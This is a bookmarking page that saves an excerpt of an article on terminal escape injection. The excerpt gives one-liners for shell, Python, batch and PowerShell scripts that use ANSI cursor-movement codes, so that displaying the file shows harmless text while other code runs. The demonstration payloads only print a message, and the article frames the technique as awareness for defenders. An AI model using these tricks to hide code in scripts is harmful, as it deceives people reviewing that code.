Links
Tag cloud
Picture wall
Daily
RSS Feed
  • RSS Feed
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filters

Links per page

  • 20 links
  • 50 links
  • 100 links

Filters

Untagged links
Terminal Escape Injection - InfosecMatter https://www.infosecmatter.com/terminal-escape-injection/
Fri Apr 17 14:38:02 2020 archive.org
thumbnail

Shell script escape injection

  echo -e '#!/bin/sh\n\necho "evil!"\nexit 0\n\033[2Aecho "Hello World!"\n' > script.sh
 chmod a+x script.sh

The resulting script.sh will then work on (has been tested on):

 Linux (gnome-terminal, xterm, aterm)
 Mac OS (Terminal 2.0, iTerm2)
 Cygwin (Windows)

Python script escape injection

     echo -e '#!/usr/bin/python\n\nprint "evil!";\nexit(0);\n#\033[2A\033[1Dprint "Hello World!";\n' > script.py
   chmod a+x script.py

The resulting script.py will then work on (has been tested on):

Linux (gnome-terminal, xterm, aterm)
Mac OS (Terminal 2.0, iTerm2)
Cygwin (Windows)

Batch (Command Prompt) escape injection

     echo -e '@echo off\n\r\n\recho evil!\r\n::\033[2D  \033[A\033[2Decho Hello World!' > script.bat

The resulting script.bat will then work on (has been tested on):

Windows 10 PowerShell
Windows 10 Command Prompt

PS1 (PowerShell) escape injection

      echo -e 'write-host "evil!"\r\n#\033[A\033[2Dwrite-host "Hello World!"' > script.ps1

The resulting script.ps1 will then work on (has been tested on):

Windows 10 PowerShell
Windows 10 Command Prompt

Conclusion

As we have seen in this article, terminal escape injections affect practically every modern operating system environment and they can be really nasty.

As infosec professionals, we should know about them and keep our guards up when it matters. Hopefully this article provided enough information to stay safe.

Please feel free to let us know in the comment section your thoughts.

secu injection terminal shell
1578 links, including 7 private
Shaarli - The personal, minimalist, super-fast, database free, bookmarking service by the Shaarli community - Theme by kalvn